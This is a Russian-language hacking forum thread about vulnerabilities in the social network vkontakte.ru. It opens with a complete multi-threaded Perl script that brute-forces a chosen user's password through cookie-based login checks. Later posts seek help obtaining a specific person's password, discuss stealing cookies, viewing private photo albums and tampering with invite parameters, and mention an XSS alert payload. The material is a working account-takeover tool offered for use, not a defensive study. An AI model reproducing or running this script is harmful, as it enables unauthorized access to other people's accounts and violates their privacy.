Форум АНТИЧАТ - Некоторые баги vkontakte.ru

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)

- - Некоторые баги vkontakte.ru (https://forum.antichat.xyz/showthread.php?t=45578)

так как народ стучит в аську и спрашивает почему не работает скрипт, выкладываю исправленную версию, так как баг с куками прикрыли теперь нужно знать мыло

Код:

#!/usr/bin/perl



use IO::Socket;

use MD5;

use threads;

use threads::shared;

my @pass : shared;



##########################################

# C!klodoL

# vkontakte.ru bruteforce with multi-threads

##########################################

$dic = 'pass.txt';                #словарь паролей

$id = 111111;                #id цели

$mail = 'mail%40mail.com';        #мыло, вместо @ вписать %40

$threads = 4;                #количество потоков

##########################################



open (pass, "<$dic");



Next:

@pass = pass();



for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}

for(@trl) { $_->join; }



sub Brut

{



while (@pass){



$pass = shift @pass;



$md5 = MD5->hexhash($pass);

$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);

print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".

        "Host: vkontakte.ru\r\n".

        "Accept: */*\r\n".

            "Content-Type: application/x-www-form-urlencoded\r\n".

            "User-Agent: Mozillo\r\n".

            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".

            "Connection: close\r\n\r\n";

$answ = <$sock>;

close $sock;

print "$pass  $answ";

if ($answ =~ /302/){

open (good, '>>good.txt');

print good "$id:$pass:$md5\n";

print "$id:$pass:$md5\n";

close good;

exit;}

}



}



goto Next;



sub pass

{

        my (@mas);

        while (<pass>){

        push @mas, $_;

        last if (@mas > 500);

        }

        chomp @mas;

        return @mas;

}

Цитата:

Может Павлик даже больше чем просто программист=)

сегодня заметил что у павлика миранда даже ip не скрывает 8)

Можно украсть cookies пользователя и поставить их на свою машину, как это сделано на примере mail.ru. Только как их тиснуть?

кто поднаторел в этом деле может мне помоч, надо узнать пас чела там

Интересно, а узнать мыло можно? Не прибегая к соц. инженерии... :rolleyes:

Нашел пару ошибок:
http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
Параметр "m" можно указать самому
http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=

+ при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )

В принципе ничего серьезного,так мелочи

Цитата:

Сообщение от lsass.exe

А по подробнее, плиз... реально интересно... ;)

а никто не задумывался как смотреть закрытые альбомы?
ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться

Там есть группа <script language="JavaScript">alert("xak")</script>. Они этот вопрос поднимали уже. Поищи в обсуждениях

Цитата:

Сообщение от ыть

раньше можно было смотреть просто изменив ссылку, сейчас по моему уже нет